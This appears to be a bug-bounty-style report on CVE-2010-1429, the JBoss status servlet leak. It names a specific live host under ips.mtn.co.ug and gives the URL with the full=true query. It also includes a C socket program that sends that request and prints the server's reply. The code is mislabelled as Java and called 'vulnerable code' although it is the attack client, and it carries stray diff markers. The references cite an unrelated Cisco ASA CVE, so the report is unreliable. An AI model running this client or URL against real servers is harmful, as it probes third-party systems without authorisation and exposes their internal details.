CVE-2010-1429 JBoss Insecure Storage of Sensitive Information on ips.mtn.co.ug

## Summary: Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. this issue exists because of a CVE-2008-3273 regression. by requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address. ## Proof of concept 1. Navigate intercept / visit hostserver on https://h30f.n1.ips.mtn.co.ug/status?full=true 1. You can see on the page is sensitive has exposed 1. Bellow of vulnerable code ```java #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <netinet/tcp.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> int socket_connect(char *host, in_port_t port){ struct hostent *hp; struct sockaddr_in addr; int on = 1, sock; if((hp = gethostbyname(host)) == NULL){ herror("gethostbyname"); exit(1); } bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); addr.sin_port = htons(port); addr.sin_family = AF_INET; sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int)); if(sock == -1){ perror("setsockopt"); exit(1); } if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){ perror("connect"); exit(1); } return sock; } - #define BUFFER_SIZE 1024 int main(int argc, char *argv[]){ int fd; char buffer[BUFFER_SIZE]; if(argc < 3){ - fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]); exit(1); } fd = socket_connect(argv[1], atoi(argv[2])); + write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len); while(read(fd, buffer, BUFFER_SIZE - 1) != 0){ fprintf(stderr, "%s", buffer); } shutdown(fd, SHUT_RDWR); close(fd); return 0; } ``` ## Supporting Material/References: The JBoss Enterprise Application Platform 4.2.0.CP03 and 4.3.0.CP01 updates for Red Hat Enterprise Linux 4 and 5 fixed an issue (CVE-2008-3273) where unauthenticated users were able to access the status servlet; however, a bug fix included in the 4.2.0.CP06 and 4.3.0.CP04 updates re-introduced the issue. A remote attacker could use this flaw to acquire details about deployed web contexts. * https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd * https://nvd.nist.gov/vuln/detail/CVE-2018-0296 * https://hackerone.com/reports/378698 ## Impact Red Hat JBoss Enterprise Application Platform could allow a remote attacker to obtain sensitive information, caused by improper restrictions on the status servlet. An attacker could exploit this vulnerability to obtain details about deployed Web contexts and other sensitive information. https://github.com/advisories/GHSA-x26p-67q3-4mfx